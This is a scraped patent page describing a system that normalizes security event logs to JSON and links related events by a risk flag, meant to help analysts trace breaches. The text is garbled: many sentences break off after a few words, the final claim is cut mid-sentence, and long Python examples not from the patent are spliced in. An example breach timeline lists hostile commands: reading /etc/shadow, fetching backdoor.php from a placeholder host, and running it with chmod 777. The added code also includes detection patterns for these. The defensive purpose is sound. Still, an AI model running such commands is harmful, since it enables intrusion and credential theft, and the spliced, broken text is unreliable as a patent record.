KR20170058140A - An analysis system of security breach with analyzing a security event log and an analysis method thereof - Google Patents
- Publication number: KR20170058140A
- Application number: KR1020150161973A
- Authority: KR (South Korea)
- Prior art keywords: event, log, security, event log, analysis
Classifications
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/30—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information
- H04L63/308—Network architectures or network communication protocols for network security for supporting lawful interception, monitoring or retaining of communications or communication related information retaining data, e.g. retaining successful, unsuccessful communication attempts, internet access, or e-mail, internet telephony, intercept related information or call content
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Technology Law (AREA)
- Debugging And Monitoring (AREA)
Description
The present invention relates to a system and method for analyzing security breaches through security event log analysis. More particularly, it relates to a security breach analysis system, and an analysis method using security event log analysis, that analyzes the event logs generated while a security breach takes place on a local terminal.
With the growth of information system assets, diverse operating systems (OS), mobile application programs (APPLICATION) and security solutions have been developed and deployed. The security events recorded in these diverse environments are likewise stored in diverse formats, and their volume is growing rapidly.
Events related to security breaches on the various kinds of local terminals are recorded in an event log by the local terminal itself or by a monitoring device on the network. The administrator analyzes the generated event log to assess the damage caused by the breach and takes measures to prevent further intrusion.
FIG. 1 is a block diagram illustrating a network risk composite analysis system according to the prior art.
The plurality of
The log
The individual
In the related art, however, the network-based security event log is analyzed only to measure risk. In some cases it is more effective to group related security events and analyze them together, but conventional network-based log analysis cannot provide such a correlated analysis method, so this need is difficult to meet efficiently.
According to one aspect of the present invention, there is provided a security breach analysis system and analysis method using security event log analysis that processes the various types of security event logs generated on local terminals and the network into a single format, records each normalized event log as a JSON file in a NoSQL database, and analyzes the stored event logs to identify the elements of a security breach.
According to the present invention, linkage analysis of the various event logs is also performed on the basis of the source or destination address selected by a risk flag, so that the flow, location, threat and vulnerability of a security breach can be grasped accurately.
The present invention has been made to solve the above-mentioned problems, and it is an object of the present invention to provide a security breach analysis system that analyzes security events occurring on a local terminal and presents them to an administrator. An integrated
The normalized event log is composed of data having the fields "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE". TIME is the time at which the security event was detected, in Unix time format; TYPE is the type of security event; HOST is the IP address or host name of the sensor that detected the security event; SRC is the originating IP of the security event; DST is the destination IP of the security event; CONTENTS_001 through CONTENTS_004 hold the detailed contents of the security event; and LINKED_LOGTYPE defines the event logs targeted by linkage analysis, namely the event log types in which security events at or above a predetermined threshold occur within a certain period before and after the occurrence time of the single event.
If the risk flag included in the event log to be detected is 1, the
The single
According to another embodiment of the present invention, there is provided a security breach analysis method using the security breach analysis system. When the local
The normalized event log is composed of data having the fields "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE". TIME is the time at which the security event was detected, in Unix time format; TYPE is the type of security event; HOST is the IP of the sensor that detected the security event; SRC is the originating IP of the security event; DST is the destination IP of the security event; CONTENTS_001 to CONTENTS_004 hold the detailed contents of the security event; and LINKED_LOGTYPE defines the event logs targeted by linkage analysis. It is characterized in that the targeted event logs are those in which security events at or above a predetermined threshold occur within a predetermined time before and after the occurrence time of the single event.
If the risk flag included in the event log to be detected is 1, the
The single
According to the present invention, security breaches against various types of local terminals can be recorded as normalized event logs and analyzed in an integrated way. By classifying and analyzing the event logs associated with a specific piece of information, the security breach, its threats and its vulnerabilities can be grasped.
In addition, sorting the events into chronological order makes the course of a breach attempt easy to identify, which minimizes the human, time and material resources required for event analysis.
FIG. 1 is a block diagram illustrating a system for analyzing overall network risk according to the prior art.
FIG. 2 is a block diagram illustrating the structure and connections of a security breach analysis system according to an embodiment of the present invention.
FIG. 3 is a flowchart illustrating the process of a security breach analysis method using the analysis system of the present invention.
FIG. 4 is a table showing an example of a detection rule included in the event detection rule DB.
FIGS. 5A and 5B are tables showing the results of linkage analysis of event logs.
Hereinafter, a security infringement analysis system and analysis method using security event log analysis according to an embodiment of the present invention will be described with reference to the drawings.
FIG. 2 is a block diagram illustrating the structure and connections of a security breach analysis system according to an embodiment of the present invention.
(hereinafter referred to as the "analysis system") of the present invention collects and analyzes security breach events occurring in a
The local
The
The integrated
The
In the present invention, normalizing the event log in JSON form is convenient for recording in the NoSQL-based integrated
The attributes of the event log that are normalized and stored by the
The single
The
In the present invention, when the single event detection result is true, the risk flag (FLAG) of the matching event detection rule is checked to decide whether linkage analysis is performed. The risk flag is set with reference to the information protection guidelines established by the administrator, the administrator's operational experience, Common Vulnerabilities and Exposures (CVE) data, and the like. In accordance with the risk flag, the
The
The event
FIG. 4 is a table showing an example of a detection rule included in the event detection rule DB. The meaning of each data field of a detection rule is shown in Table 1 below.
"logtype" is the type of security event to be detected in the present invention, and includes:
- network packet event logs (syslogs)
- firewall policy event logs (iptableslogs)
- intrusion detection/prevention system event logs (detectionlogs)
- malicious code infection event logs (infectedlogs)
- router/switch network event logs (networklogs)
- Linux SSH (secure shell) event logs (securelogs)
- web application firewall event logs (waflogs)
- Linux system command execution event logs (cmdlogs)
- malware event logs (malwarelogs)
- virtual private network (VPN) event logs (vpnlogs)
- Windows remote terminal event logs
- file system monitor event logs (filemonlogs)
- Windows registry monitor event logs (regmonlogs)
- executable file download event logs (httpdlogs)
- information system domain query event logs (dnslogs)
- web access event logs (accesslogs)
- database event logs (dblogs)
- system security patch event logs (patchlogs)
- system account event logs (userlogs)
- system network state event logs (netstatelogs)
- rootkit event logs (rootkitlogs)
Each security event is recorded in a form that depends on the local terminal's configuration environment, such as a log file, a database, or a network pcap (packet capture) file.
The "history" column records the definitions and characteristics of detection rules and is used to manage the history of registration, modification, deletion, etc. of detection rules by the
"registertime" records the creation time of the detection rule, that is, the date and time at which the rule was registered/created.
"supervisionid" is a unique value identifying the security manager or system that registered the detection rule.
"cnt" records the index number of the detection rule, an index that increases sequentially each time the security manager or the system registers/creates a rule.
"flag" records the risk flag. The risk flag is determined by substituting the risk of the detection rule (from CVE, the information protection guideline, or a risk assessment based on the information protection organization's experience) into the risk flag calculation formula.
When the risk flag is 0, the single
In the
The security breach analysis method using the above configuration is now described in detail.
FIG. 3 is a flowchart illustrating the process of the security breach analysis method using the analysis system of the present invention.
First, the
The security event list collected by the
The
Event log normalization is intended to let the administrator grasp the contents of a security event quickly by presenting, under common attribute fields, data that the various event logs record in different forms.
In the present invention, event log normalization sorts the data contained in an event log into the fields "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004 and LINKED_LOGTYPE".
The information represented by each field is shown in Table 2 below.
The TIME field records the time of detection of the security event as a Unix timestamp.
The HOST field records the IPv4 address or host name of the detection sensor; a host name is used only where it can be resolved through DNS.
The addresses recorded in the SRC and DST fields are likewise IPv4 addresses.
The CONTENTS fields describe the details recorded when the event log entry was created and may include the specific contents of keywords related to the event log.
The LINKED_LOGTYPE field defines the target event logs with which the event log is linked in linkage analysis. The targets are the event logs in which security events occur at or above a predetermined threshold within a certain time before or after the occurrence time of the specific single event.
For example, if a single security event occurs at 1 PM on November 2, 2015 and linkage analysis is to be performed on it, the other event logs that recorded more than 10 security events in the hour on either side of 1 PM can be linked and analyzed. That is, the event log types in which a security event occurred more than 10 times during the two hours from 12:00 PM to 2:00 PM are selected.
Criteria such as the reference time, the length of the period before and after the event, and the threshold number of events can be chosen as appropriate by the security administrator or the system.
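As an added worked example (not code from the patent), the following Python normalizes a few constructed raw log lines of three types into the ten-field schema above, serializes each record as the JSON document that would be stored in the integrated log DB, and then selects LINKED_LOGTYPE for one single event with the time-window and threshold rule just described. The raw line formats (an iptables-style line with an epoch prefix, an Apache access line, an sshd syslog line), the sensor IP table, the assumed syslog year and every sample line are assumptions, not taken from the page.

```python
"""Normalization of raw log lines into the ten-field event schema on this
page (TIME, TYPE, HOST, SRC, DST, CONTENTS_001..004, LINKED_LOGTYPE),
JSON serialization, and LINKED_LOGTYPE selection by the "at least N
events within +/- W seconds" rule.  Example written for this page, not
the patent's implementation; the three raw formats, the sensor IP
table, the syslog year and every sample line are assumptions."""
import json
import re
from datetime import datetime, timezone

FIELDS = ("TIME", "TYPE", "HOST", "SRC", "DST", "CONTENTS_001",
          "CONTENTS_002", "CONTENTS_003", "CONTENTS_004", "LINKED_LOGTYPE")

# Assumed IPv4 address of each sensor host (the page records HOST as an
# IPv4 address or a DNS-resolvable host name).
SENSOR_IP = {"fw01": "218.15.30.1", "web01": "218.15.30.40"}

# One parser per logtype: an iptables-style line with an epoch prefix,
# an Apache access line, and an sshd syslog line (all assumed formats).
PARSERS = {
    "iptableslogs": re.compile(
        r"^(?P<ts>\d+) (?P<action>\w+) .*?SRC=(?P<src>\S+) DST=(?P<dst>\S+)"
        r".*?DPT=(?P<dpt>\d+)"),
    "accesslogs": re.compile(
        r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'),
    "securelogs": re.compile(
        r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
        r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?"
        r"(?P<user>\S+) from (?P<src>\S+)"),
}


def normalize(host, logtype, line, syslog_year=2015):
    """Map one raw line onto the common schema.  TIME is a Unix timestamp
    (UTC); LINKED_LOGTYPE starts empty and is filled by linked_logtypes."""
    regex = PARSERS.get(logtype)
    if regex is None:
        raise ValueError(f"no normalizer for logtype {logtype!r}")
    m = regex.match(line)
    if m is None:
        raise ValueError(f"{logtype} line did not parse: {line!r}")
    rec = dict.fromkeys(FIELDS, "")
    rec["TYPE"], rec["HOST"], rec["LINKED_LOGTYPE"] = logtype, host, []
    if logtype == "iptableslogs":
        rec["TIME"] = int(m["ts"])
        rec["SRC"], rec["DST"] = m["src"], m["dst"]
        rec["CONTENTS_001"], rec["CONTENTS_002"] = m["action"], "dpt=" + m["dpt"]
    elif logtype == "accesslogs":
        rec["TIME"] = int(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").timestamp())
        rec["SRC"], rec["DST"] = m["src"], SENSOR_IP[host]   # the server is the destination
        rec["CONTENTS_001"], rec["CONTENTS_002"] = m["req"], "status=" + m["status"]
    else:  # securelogs; syslog carries no year, so the caller supplies it
        ts = datetime.strptime(f"{syslog_year} {m['ts']}", "%Y %b %d %H:%M:%S")
        rec["TIME"] = int(ts.replace(tzinfo=timezone.utc).timestamp())
        rec["SRC"], rec["DST"] = m["src"], SENSOR_IP[host]
        rec["CONTENTS_001"] = f"{m['result']} {m['method']} for {m['user']}"
    return rec


def to_json(rec):
    """The JSON document that would be written to the NoSQL integrated log DB."""
    return json.dumps(rec, sort_keys=True)


def linked_logtypes(events, single, window_s=3600, threshold=10):
    """LINKED_LOGTYPE for `single`: the TYPEs with at least `threshold` events
    within +/- window_s of single["TIME"], not counting the single event itself.
    The page's example (more than 10 events in the two hours around 1 PM) is
    window_s=3600, threshold=11."""
    lo, hi = single["TIME"] - window_s, single["TIME"] + window_s
    counts = {}
    for e in events:
        if e is not single and lo <= e["TIME"] <= hi:
            counts[e["TYPE"]] = counts.get(e["TYPE"], 0) + 1
    return sorted(t for t, n in counts.items() if n >= threshold)


# Constructed sample input (sensor host, logtype, raw line), 2 Nov 2015 UTC;
# 125.141.10.20 plays the attacker and 218.15.30.40 the web server.
RAW_EVENTS = [
    ("fw01", "iptableslogs",
     "1446462624 ACCEPT IN=eth0 OUT=eth1 SRC=125.141.10.20 DST=218.15.30.40 PROTO=TCP DPT=80"),
    ("web01", "accesslogs",
     '125.141.10.20 - - [02/Nov/2015:11:11:26 +0000] '
     '"GET /item.php?id=1%20UNION%20SELECT%201,2 HTTP/1.1" 200 512'),
    ("web01", "securelogs",
     "Nov  2 11:11:29 web01 sshd[2211]: Accepted password for root from 125.141.10.20 port 51022 ssh2"),
] + [
    # a burst of twelve failed root logins a few minutes earlier, enough to
    # push securelogs over the linkage threshold
    ("web01", "securelogs",
     f"Nov  2 11:05:{i:02d} web01 sshd[2198]: Failed password for root "
     f"from 125.141.10.20 port 5{i:04d} ssh2")
    for i in range(12)
]

NORMALIZED = [normalize(h, t, line) for h, t, line in RAW_EVENTS]
SINGLE = NORMALIZED[1]                      # the request that looks like SQL injection
SINGLE["LINKED_LOGTYPE"] = linked_logtypes(NORMALIZED, SINGLE)
```

With the sample data only securelogs crosses the threshold (13 events in the window), so the single event's LINKED_LOGTYPE becomes ["securelogs"]; the firewall log, with one event, is left out. Note that the DST of access and SSH events is taken from the sensor table, because those log lines name only the client; a real deployment has to decide that mapping per sensor.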
The single
The single
In the case of content-based detection, the patterns referenced in the event
In the case of host-based detection, a keyword referred to in the event
The single
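The content-based and host-based detection just described, as an added example that is not the patent's code: keywords combined with AND, OR and NOT are matched against the CONTENTS_001 to CONTENTS_004 fields or against HOST, SRC and DST of a normalized event, and a rule fires only for events of its own logtype. The rule record keeps the page's logtype, flag, cnt and supervisionid columns; the basis and pattern columns, the operator tuple syntax, and all sample rules and events are assumptions.

```python
"""Single-event detection in the style of the event detection rule DB on
this page: rule keywords combined with AND / OR / NOT are pattern-matched
against CONTENTS_001..004 (content-based) or HOST, SRC and DST
(host-based) of a normalized event.  Example written for this page, not
the patent's code; the rule columns beyond logtype, flag, cnt and
supervisionid, the operator syntax and all sample data are assumptions."""
import re

CONTENT_FIELDS = ("CONTENTS_001", "CONTENTS_002", "CONTENTS_003", "CONTENTS_004")
HOST_FIELDS = ("HOST", "SRC", "DST")


def match(expr, text):
    """Evaluate a rule expression against text.  A str is a regular
    expression searched case-insensitively; a tuple is
    (operator, operand, ...) with operator AND, OR or NOT."""
    if isinstance(expr, str):
        return re.search(expr, text, re.IGNORECASE) is not None
    op, *args = expr
    if op == "AND":
        return all(match(a, text) for a in args)
    if op == "OR":
        return any(match(a, text) for a in args)
    if op == "NOT":
        if len(args) != 1:
            raise ValueError("NOT takes exactly one operand")
        return not match(args[0], text)
    raise ValueError(f"unknown operator {op!r}")


def detect(event, rules):
    """cnt of every rule that fires on one normalized event.  A rule only
    applies to events of its own logtype; content-based rules see the four
    CONTENTS fields joined with spaces, host-based rules see HOST/SRC/DST."""
    hits = []
    for rule in rules:
        if rule["logtype"] != event["TYPE"]:
            continue
        fields = CONTENT_FIELDS if rule["basis"] == "content" else HOST_FIELDS
        text = " ".join(str(event.get(f, "")) for f in fields)
        if match(rule["pattern"], text):
            hits.append(rule["cnt"])
    return hits


def detect_all(events, rules):
    """(TIME, TYPE, fired rule cnts) for every event that fired at least one rule."""
    out = []
    for e in events:
        hits = detect(e, rules)
        if hits:
            out.append((e["TIME"], e["TYPE"], hits))
    return out


# Constructed sample rules; 'flag' is the risk flag the linkage step reads.
RULES = [
    {"cnt": 1, "logtype": "detectionlogs", "basis": "content", "flag": 2,
     "supervisionid": "admin01",
     # SQL injection: UNION [ALL] SELECT or a quote tautology, unless the
     # request carries the internal scanner's marker
     "pattern": ("AND",
                 ("OR", r"union\s+(all\s+)?select", r"'\s*or\s+1\s*=\s*1"),
                 ("NOT", r"internal-scanner"))},
    {"cnt": 2, "logtype": "cmdlogs", "basis": "content", "flag": 3,
     "supervisionid": "admin01",
     "pattern": ("OR", r"/etc/shadow", r"wget\s+https?://", r"chmod\s+777")},
    {"cnt": 3, "logtype": "securelogs", "basis": "host", "flag": 1,
     "supervisionid": "admin02",
     # watch-listed attacker address, wherever it appears in HOST/SRC/DST
     "pattern": ("OR", r"\b125\.141\.10\.20\b", r"\b198\.51\.100\.\d+\b")},
]


def ev(time, typ, host, src, dst, contents):
    """Build a normalized event with one CONTENTS field populated."""
    return {"TIME": time, "TYPE": typ, "HOST": host, "SRC": src, "DST": dst,
            "CONTENTS_001": contents, "CONTENTS_002": "", "CONTENTS_003": "",
            "CONTENTS_004": "", "LINKED_LOGTYPE": []}


# Constructed sample events (Unix times on 2 Nov 2015).
EVENTS = [
    ev(1446462624, "detectionlogs", "ids01", "125.141.10.20", "218.15.30.40",
       "GET /item.php?id=1 UNION ALL SELECT user,pass FROM users"),
    ev(1446462630, "detectionlogs", "ids01", "10.0.0.5", "218.15.30.40",
       "GET /item.php?id=1' OR 1=1-- internal-scanner/2.1"),
    ev(1446463240, "cmdlogs", "web01", "218.15.30.40", "218.15.30.40",
       "vim /etc/shadow"),
    ev(1446462689, "securelogs", "web01", "125.141.10.20", "218.15.30.40",
       "Accepted password for root"),
    ev(1446462686, "accesslogs", "web01", "125.141.10.20", "218.15.30.40",
       "GET /item.php?id=1 UNION SELECT 1,2"),   # no rule for this logtype
]
```

The NOT operand in the first rule is what keeps the page's own scanner traffic out of the SQL injection detections; the last sample event shows that the logtype check, not just the keyword match, decides whether a rule fires, so the same keywords in an access log need their own rule.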
Next, the
The risk flag is determined when an information protection manager performing an information protection activity registers / creates a single event detection rule in the event
In the case of CVE, reference is made to the High/Medium/Low classes assigned by CVSS (Common Vulnerability Scoring System): a High severity corresponds to a score of 7.0 to 10.0, Medium to 4.0 to 6.9, and Low to 0 to 3.9. In some cases only two classes are distinguished, Medium or higher and below Medium.
In the case of the information protection guideline, the first grade is treated as 'high', the second grade as 'medium' and the third grade as 'low'. In some cases, the risk flag may be raised in the case of
The administrator of the information protection may determine the flag value by referring to the experience in the security issue / analysis of the information security organization.
The risk flag can be determined by referring to the CVE, the information protection guidelines, and the manager's experience. In addition, the risk flag can be selected according to various criteria. In the
The
When the risk flag of the detected event log is 0, no linkage analysis is performed.
When the risk flag is 1, the SRC value (the originating IP of the security event) is extracted from the corresponding security event log, and linkage analysis is performed as an OR operation over the SRC and DST fields of the event logs of the types defined in the "LINKED_LOGTYPE" column of the normalized data: every such event whose SRC or DST equals the extracted address is linked.
When the risk flag is 2, the DST value (the destination IP of the security event) is extracted from the corresponding security event log, and linkage analysis is likewise performed as an OR operation over the SRC and DST fields of the event logs defined in the "LINKED_LOGTYPE" column.
When the risk flag is 3, both the SRC and DST values are extracted from the corresponding security event log, and linkage analysis is performed as an AND operation over SRC and DST of the security events in the logs defined in the "LINKED_LOGTYPE" column: only events in which both addresses appear are linked.
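The three linkage modes, as an added example (not the patent's code), run over a constructed set of normalized events that loosely follows the scenario of Table 3 below: an SQL injection detection from an attacker address to a web server, followed by an SSH login, command execution, a download and DNS queries on that server. The AND case for flag 3 is read here as the single event's two addresses appearing as the SRC/DST pair of a linked event in either direction, which is an assumption; the addresses, event contents and host names are constructed.

```python
"""Linkage analysis driven by the risk flag, as described on this page:
flag 1 pivots on the single event's SRC and flag 2 on its DST, each
matched against SRC or DST (OR) of the event logs named in
LINKED_LOGTYPE; flag 3 uses both addresses (AND); flag 0 does nothing.
Example written for this page, not the patent's code.  The AND case is
read as "the same address pair in either direction" (an assumption),
and the sample events, which loosely follow the page's Table 3, are
constructed."""
from datetime import datetime, timezone


def linkage(single, flag, events):
    """Events of the types listed in single["LINKED_LOGTYPE"] that the risk
    flag ties to the single event, sorted by TIME."""
    src, dst = single["SRC"], single["DST"]
    predicates = {
        0: lambda e: False,                                # no linkage analysis
        1: lambda e: src in (e["SRC"], e["DST"]),          # SRC pivot, OR over SRC/DST
        2: lambda e: dst in (e["SRC"], e["DST"]),          # DST pivot, OR over SRC/DST
        3: lambda e: {e["SRC"], e["DST"]} == {src, dst},   # AND: both addresses present
    }
    if flag not in predicates:
        raise ValueError(f"unsupported risk flag {flag}")
    related = predicates[flag]
    linked_types = set(single["LINKED_LOGTYPE"])
    hits = [e for e in events
            if e is not single and e["TYPE"] in linked_types and related(e)]
    return sorted(hits, key=lambda e: e["TIME"])


def timeline(single, linked):
    """Rows in the style of the page's Table 3: 'HH:MM:SS TYPE CONTENTS_001'
    for the single event and its linked events, in time order (UTC)."""
    rows = sorted([single, *linked], key=lambda e: e["TIME"])
    return [f"{datetime.fromtimestamp(e['TIME'], timezone.utc):%H:%M:%S} "
            f"{e['TYPE']:<14} {e['CONTENTS_001']}" for e in rows]


# Constructed scenario on 2 Nov 2015 (UTC).  A = attacker, V = victim web
# server, O = another server in the same network, R = the site resolver.
A, V, O, R = "125.141.10.20", "218.15.30.40", "218.15.30.41", "218.15.30.53"
_DAY = int(datetime(2015, 11, 2, tzinfo=timezone.utc).timestamp())


def ev(hms, typ, src, dst, contents):
    """Normalized event at clock time hms ('HH:MM:SS') on the scenario day.
    HOST (the sensor) is a fixed placeholder; linkage does not use it."""
    h, m, s = (int(x) for x in hms.split(":"))
    return {"TIME": _DAY + h * 3600 + m * 60 + s, "TYPE": typ, "HOST": "sensor01",
            "SRC": src, "DST": dst, "CONTENTS_001": contents, "CONTENTS_002": "",
            "CONTENTS_003": "", "CONTENTS_004": "", "LINKED_LOGTYPE": []}


SINGLE = ev("11:10:24", "detectionlogs", A, V, "SQL injection attempt detected")
SINGLE["LINKED_LOGTYPE"] = ["securelogs", "cmdlogs", "httpdlogs", "dnslogs", "accesslogs"]

EVENTS = [
    SINGLE,
    ev("11:11:29", "securelogs", A, V, "Accepted password for root"),
    ev("11:15:00", "accesslogs", A, O, "GET /login.php"),               # attacker elsewhere
    ev("11:16:00", "iptableslogs", "198.51.100.9", V, "DROP dpt=23"),   # type not linked
    ev("11:17:00", "accesslogs", "198.51.100.9", O, "GET /"),           # unrelated
    ev("11:20:40", "cmdlogs", V, V, "vim /etc/shadow"),                 # host-local: SRC = DST
    ev("11:21:06", "httpdlogs", V, "203.0.113.7", "GET /backdoor.php"),
    ev("11:22:05", "dnslogs", V, R, "query for a suspected malicious domain"),
]
```

With flag 2 (pivot on the victim's address, as in Table 3) the result is the SSH login, the command, the download and the DNS query, in that order; the firewall drop against the same server is excluded because iptableslogs is not in LINKED_LOGTYPE. Flag 1 instead follows the attacker, which also pulls in the request to the second server, and flag 3 keeps only the events between the attacker and the victim. Host-local events such as cmdlogs have no natural SRC/DST, so the convention used for them (here SRC = DST = the host) decides whether a DST pivot finds them at all.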
The
FIGS. 5A and 5B are tables showing the result of linkage analysis of event logs.
Referring to FIGS. 5A and 5B, an event log of the intrusion detection/prevention system was detected for traffic from the SRC (originating IP address) 125.141.XX.XX (placeholder) to the DST (destination IP address) 218.15.XX.XX (placeholder). Since the risk flag stored in the event
Table 3 below lists the security events of FIGS. 5A and 5B in time sequence.
Time | Event |
---|---|
11:10:24 AM | Risk flag determined as 2; linkage analysis performed on the event logs declared in the normalized LINKED_LOGTYPE column |
11:10:26 AM | |
11:11:26 AM | |
11:11:27 AM | |
11:11:29 AM | |
11:11:29 AM | |
11:11:31 AM | |
11:11:33 AM | |
11:20:32 AM | |
11:20:40 AM | File access detected: vim /etc/shadow executed |
11:20:55 AM | File browsing detected: vim /etc/hosts executed |
11:21:05 AM | Download detected: wget http://xxx.xx.xx/backdoor.php |
11:21:06 AM | Packet for the download of http://xxx.xx.xx/backdoor.php |
11:21:56 AM | mv backdoor.php /tmp/system.php |
11:22:01 AM | chmod 777 /tmp/system.php; php /tmp/system.php |
11:22:05 AM | Domain query to a suspected malicious site detected |
11:22:06 AM | Domain query to a suspected malicious site detected |
11:22:07 AM | Domain query to a suspected malicious site detected |
11:22:47 AM | Anti-virus (vaccine) malware detection |
11:24:01 AM | SSL vulnerability detection |
11:24:12 AM | BASH SHELL vulnerability detection |
To summarize the security events recorded in Table 3 (step 21): an SQL injection attack attempt was detected in the intrusion detection/prevention system event log (detectionlogs). Linkage analysis according to its risk flag (2) then drew in the web application firewall event log (waflogs), the Linux SSH event log (securelogs), the Linux system command execution event log (cmdlogs), the executable file download event log (httpdlogs), the system domain query event log (dnslogs), the malicious code infection event log (infectedlogs) and the system patch event log (patchlogs).
Therefore, the flow and location of a security breach involving a specific IP address, and the security threats (vulnerabilities) of a specific system, can be checked quickly through linkage analysis.
If the risk flag of a specific security event log is 1, SRC-based linkage analysis can be performed and its result provided to the administrator; when the risk flag is 3, linkage analysis is performed with both SRC and DST as the reference.
However, the choice of linkage field for each risk flag value may vary with the characteristics of the system. That is, a risk flag of 2 may select SRC-based linkage and a risk flag of 1 DST-based linkage, and a new linkage condition may be defined for a newly introduced risk flag value.
The result of the linkage analysis is stored in the
Therefore, starting from a single security event, the linkage analysis result reveals the intrusion detection, the cause of the breach, the threat and the vulnerability, and arranging the events in sequence on a timeline lets the administrator check the course of the breach.
It also reduces the human, material and time resources required to analyze security breaches.
While the present invention has been described with reference to exemplary embodiments, it is to be understood that the invention is not limited to the disclosed embodiments, and that various modifications and equivalent arrangements will be apparent to those skilled in the art. Therefore, the above-described embodiments are to be considered in all respects as illustrative and not restrictive, the scope of the invention being indicated by the appended claims rather than by the foregoing description, and all changes and modifications derived from equivalent concepts are intended to be included within the scope of the present invention.
100: analysis system
102: integrated log collection unit
104: log normalization unit
106: single event detection unit
108: linkage analysis unit
110: risk measurement unit
112: event detection rule DB
114: integrated log DB
200: local terminal
202: local log collection unit
300: administrator terminal
Claims (8)
An integrated log collection unit 102 for receiving the event log collected by the local log collection unit 202 installed in the local terminal 200 and storing the received event log in the integrated log DB 114;
a log normalization unit 104 for normalizing the event log received by the integrated log collection unit 102, converting it into the JSON (JavaScript Object Notation) file format, and storing the normalized event log in the integrated log DB 114;
a single event detection unit 106 for analyzing the normalized event log by referring to the detection rules stored in the event detection rule DB 112 and determining whether the event log includes an event record that may constitute a security breach;
a linkage analysis unit 108 for linking and analyzing a plurality of event logs when the risk flag assigned to an event log detected by the single event detection unit 106 has a predetermined value;
and a risk measurement unit 110 for determining the linkage log type of the event log to be detected by referring to the risk flag column of the detection rule stored in the event detection rule DB 112; a security breach analysis system using security event log analysis comprising the above units.
The normalized event log is composed of data having the fields "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE",
wherein TIME is the detection time of the security event, TYPE is the type of security event, HOST is the IP address or host name of the sensor where the security event was detected, SRC is the source IP of the security event, DST is the destination IP of the security event, CONTENTS_001 to CONTENTS_004 are the detailed contents of the security event, and LINKED_LOGTYPE defines the target event logs for linkage analysis, namely the event logs in which a security event occurs at or above a predetermined threshold within a predetermined time before and after the occurrence time of the single event; a security breach analysis system using security event log analysis.
The linkage analysis unit 108:
if the risk flag included in the event log to be detected is 1, extracts the SRC from the event log and performs linkage analysis by an OR operation over SRC and DST of the event logs defined in "LINKED_LOGTYPE";
if the risk flag included in the event log to be detected is 2, extracts the DST from the event log and performs linkage analysis by an OR operation over SRC and DST of the event logs defined in "LINKED_LOGTYPE";
and when the risk flag included in the event log to be detected is 3, extracts SRC and DST from the event log and performs linkage analysis by an AND operation over SRC and DST of the event logs defined in "LINKED_LOGTYPE"; a security breach analysis system using security event log analysis.
The single event detection unit 106 detects a single event among the data included in the normalized event log by:
content-based detection, in which the keywords referenced in the event detection rule DB 112 are pattern-matched against CONTENTS_001 through CONTENTS_004 using a combination of AND, OR and NOT operators;
and host-based detection, in which the keywords referenced in the event detection rule DB 112 are pattern-matched against HOST, SRC and DST using a combination of AND, OR and NOT operators; a security breach analysis system using security event log analysis.
A first step in which, when the local log collection unit 202 installed in the local terminal 200 collects and transmits an event log, the integrated log collection unit 102 receives the event log and stores it in the integrated log DB 114;
a second step in which the log normalization unit 104 normalizes the event log received by the integrated log collection unit 102, converts it into a JSON (JavaScript Object Notation) file, and stores the normalized event log in the integrated log DB 114;
a third step in which the single event detection unit 106 analyzes the normalized event log by referring to the detection rules stored in the event detection rule DB 112 and determines whether the event log includes an event record that may constitute a security breach;
a fourth step in which the risk measurement unit 110 determines the linkage log type of the event log to be detected by referring to the risk flag column of the detection rule stored in the event detection rule DB 112;
and a fifth step in which a plurality of event logs are linked and analyzed when the risk flag of the event log detected by the single event detection unit 106 has a predetermined value; a security breach analysis method using security event log analysis.
The normalized event log is composed of data having the fields "TIME, TYPE, HOST, SRC, DST, CONTENTS_001, CONTENTS_002, CONTENTS_003, CONTENTS_004, LINKED_LOGTYPE",
wherein TIME is the detection time of the security event, TYPE is the type of security event, HOST is the IP address or host name of the sensor where the security event was detected, SRC is the source IP of the security event, DST is the destination IP of the security event, CONTENTS_001 to CONTENTS_004 are the detailed contents of the security event, and LINKED_LOGTYPE defines the target event logs for linkage analysis, namely the event logs in which a security event occurs at or above a predetermined threshold within a predetermined time before and after the occurrence time of the single event; a security breach analysis method using security event log analysis.
The linkage analysis unit 108:
if the risk flag included in the event log to be detected is 1, extracts the SRC from the event log and performs linkage analysis by an OR operation over SRC and DST of the event logs defined in "LINKED_LOGTYPE";
if the risk flag included in the event log to be detected is 2, extracts the DST from the event log and performs linkage analysis by an OR operation over SRC and DST of the event logs defined in "LINKED_LOGTYPE";
and when the risk flag included in the event log to be detected is 3, extracts SRC and DST from the event log and performs linkage analysis by an AND operation over SRC and DST of the event logs defined in "LINKED_LOGTYPE"; a security breach analysis method using security event log analysis.
The single event detection unit 106 detects a single event among the data included in the normalized event log by:
